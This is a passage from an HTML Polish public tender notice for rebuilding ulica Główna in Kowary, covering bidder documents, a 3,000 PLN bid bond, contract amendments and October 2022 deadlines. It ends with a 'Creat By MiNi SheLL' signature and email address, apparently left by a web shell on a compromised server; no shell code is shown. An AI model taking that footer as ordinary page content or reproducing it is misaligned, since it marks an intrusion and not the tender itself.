prowadzenia określonej działalności gospodarczej lub zawodowej, o ile <br/> wynika to z odrębnych przepisów:<br/>z uwagi na brak postawionego warunku Zamawiający odstępuje od żądania dowodów<br/>w przedmiotowym zakresie.<br/><br/><br/> 3) sytuacji ekonomicznej lub finansowej:<br/><br/>3.1) dokumentów potwierdzających, że wykonawca jest ubezpieczony od <br/> Odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/> z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>4) zdolności technicznej lub zawodowej:<br/> 4.1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie – zgodnie z treścią załącznika nr 7 do SWZ.<br/> „Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli Wykonawca<br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty”. <br/> Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, wykaz dotyczy robót budowlanych <br/>w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/> 4.2) wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w  szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie dysponowania tymi osobami – w zakresie informacji określonych w Załączniku nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 5. Przed podpisaniem umowy należy przekazać Zamawiającemu:<br/>a) dowód wniesienia zabezpieczenia należytego wykonania umowy, o którym mowa w rozdz. XXII SWZ,<br/>b) potwierdzenie, w stosunku do osób skierowanych do realizacji zamówienia, wskazanych w załączniku nr 8 - kopii dokumentów potwierdzających stosowne uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie wraz z dokumentami potwierdzającymi wpis do właściwej Izby Inżynierów Budownictwa. Aktualność wpisu musi zachować ważność przez cały okres realizacji umowy, <br/>c) umowę konsorcjum w przypadku składania oferty przez podmioty występujące wspólnie, <br/>d) umowę spółki cywilnej w przypadku składania oferty przez podmioty realizującej zadanie w tej formie organizacyjnej. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Informacje ogólne:<br/><br/>Wykonawca zobowiązany jest wnieść wadium przed terminem składania ofert w wysokości <br/>3.000,00 PLN (słownie złotych: trzy tysiące złotych 00/100).<br/><br/> 2. Wadium może być wniesione w jednej lub kilku z następujących form:<br/> • pieniądzu;<br/> • gwarancjach bankowych;<br/> • gwarancjach ubezpieczeniowych;<br/> • poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/><br/> 3. Miejsce wniesienia wadium:<br/>Wadium wnoszone w pieniądzu (PLN) należy wpłacić przelewem na następujący rachunek Zamawiającego: <br/><br/>PKO BP S.A.<br/>konto depozytowe 08 1020 2124 0000 8002 0011 1641 z adnotacją: <br/>„Przebudowa ulicy Głównej w Kowarach” <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o zamówienie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie art. 58 ust. 1 ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem. <br/>3.Wykonawcy wspólnie ubiegający się o zamówienie na podstawie art. 117 ust. 4 u.p.z.p składają wraz z ofertą oświadczenie, z którego wynika, jaki zakres przedmiotu zamówienia wykonają poszczególni Wykonawcy według wzoru stanowiącego załącznik nr 4 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegający się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że:<br/> 1. na podstawie art. 455 ust. 1 pkt 1) u.p.z.p.: <br/> 1) zmiana warunków wykonania umowy jest konsekwencją wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem warunków ich wprowadzenia: <br/> a) wystąpienia ponadnormatywnych warunków pogodowych dla miejsca wykonywania zamówienia i klęsk żywiołowych powodujących zniszczenia wykonanych wcześniej robót lub uniemożliwiających prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów;<br/> b) istotnego wpływu przedsięwzięć realizowanych przez gestorów mediów dotyczących terenu objętego przedmiotowym zamówieniem,<br/> c) konieczność usunięcia kolizji z urządzeniami infrastruktury podziemnej niezinwentaryzowanej geodezyjnie,<br/> d) siły wyższej mającej bezpośredni, udokumentowany wpływ na realizację przedmiotowego zamówienia. Wykonawca zobowiązany jest wykazać i uzasadnić w formie pisemnej, w sposób jednoznaczny i nie budzący wątpliwości, że siła wyższa miała wpływ na wykonywanie przez niego przedmiotu umowy,<br/> e) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia - odpowiednie zapisy umowy zostaną dostosowane do obowiązującego stanu prawnego.<br/> f) zaistnienia okoliczności niezależnych od stron, związanych z COVID 19, które mają lub mogą mieć wpływ na należyte wykonanie przedmiotu umowy. W takim przypadku zastosowania znajdują obowiązujące w tym zakresie przepisy prawa, w szczególności art. 15r ustawy z 2 marca 2020 o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (t.j. Dz. U. 2020 poz. 1842 z późn. zm.).<br/> 2) Wykonawca zobowiązany jest niezwłocznie, nie później niż w ciągu 7 dni od dnia wystąpienia okoliczności uzasadniających zastosowanie zapisów pkt. 1. ppkt. 1), złożyć do Zamawiającego umotywowany, pisemny wniosek o dokonanie stosownych zmian warunków wykonywania umowy.<br/> 3) Jeżeli w przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1 ppkt 1) konieczna będzie zmiana istotnych postanowień umowy, odpowiednie zapisy umowne zostaną stosownie zmodyfikowane, w sposób zapewniający zgodność ze stanem faktycznym oraz z obowiązującymi przepisami prawa.<br/> 4) W przypadku kiedy wystąpienie którejkolwiek z okoliczności wymienionych w pkt 1.1. ppkt 1) skutkować będzie zmianą powodującą modyfikację ogólnego charakteru umowy, wówczas nie przewiduje się wprowadzenia takiej zmiany.<br/> 2. zachodzi co najmniej jedna z okoliczności wymienionych w art. 455 ust. 1 pkt 2) do 4), oraz ust.2, u.p.z.p. <br/> 2. Wszystkie zmiany umowy dokonywane będą przez umocowanych przedstawicieli Zamawiającego i Wykonawcy w formie pisemnej. <br/> 3. Zmiana umowy dokonana z naruszeniem zapisów powyższych podlega unieważnieni <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonwca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniminiPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-18 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com